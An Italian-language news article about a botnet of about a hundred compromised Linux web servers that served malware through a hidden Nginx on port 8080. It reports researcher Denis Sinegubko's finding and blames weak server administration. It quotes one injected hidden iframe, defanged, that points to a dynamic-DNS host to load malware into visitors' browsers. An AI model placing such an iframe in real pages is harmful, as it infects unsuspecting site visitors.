Una botnet di webserver Linux infetta i browser degli utenti

Un ricercatore russo ha scoperto un interessante fenomeno, una rete di webserver linux impegnati nella distribuzione di malware sui pc degli utenti, tramite l'uso dei browsers web. Si tratta, in realta, di una sorta di cluster di macchine linux compromesse, e collegate a loro volta ad una botnet di pc infetti. Le macchine compromesse sono in tutti casi server dedicati o vps che erogano siti web in rete: ma una particolarita ha colpito Denis Sinegubko, il ricercato interpellato da The Register, tutte queste macchine fornivano contenuti "benigni" tramite il webserver Apache, ma al loro interno era stato installato anche Nginx, un altro webserver, utilizzato invece per distribuire il malware agli utenti che visitavano le pagine dei siti ospitati su quelle macchine.

 Un ricercatore russo ha scoperto un interessante fenomeno, una rete di webserver linux impegnati nella distribuzione di malware sui pc degli utenti, tramite l’uso dei browsers web. Si tratta, in realtà, di una sorta di cluster di macchine linux compromesse, e collegate a loro volta ad una botnet di pc infetti. Le macchine compromesse sono in tutti casi server dedicati o vps che erogano siti web in rete: ma una particolarità ha colpito Denis Sinegubko, il ricercato interpellato da The Register, tutte queste macchine fornivano contenuti “benigni” tramite il webserver Apache, ma al loro interno era stato installato anche Nginx, un altro webserver, utilizzato invece per distribuire il malware agli utenti che visitavano le pagine dei siti ospitati su quelle macchine. 

Si trattava di un vero e proprio cluster di macchine, connesso a sua volta ad una rete di pc infetti, e con un unico centro di controllo da cui partivano le istruzioni di funzionamento. I server compromessi fornivano i contenuti HTTP sulla porta 80, mentre facevano passare dalla porta 8080 il traffico http contenente malware. Da qui il malware veniva diffuso grazie a servizi come No-IP o DynDNS, utilizi per associare un nome a dominio ad un indirizzo ip dinamico presente in rete. 

Questo il risultato dell’operazione:

<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>

La rete era composta da un centinaio di macchine, poche per creare seri danni agli utenti che venivano infettati una volta visitate le pagine ospitate sui singoli nodi. Tutte le macchine analizzate utilizzavano diverse distribuzioni di Linux, tutte avevano Apache come webserver e sono state infettate a causa della scarsa sicurezza delle stesse, probabilmente con tecniche di sniffing sono state recuperate le password di root dei server, senza che i proprietari se ne accorgessero. Una mancanza grave di questi ultimi che evidenzia anche come la mancata gestione sistemistica di server in rete possa portare a conseguenze molto gravi.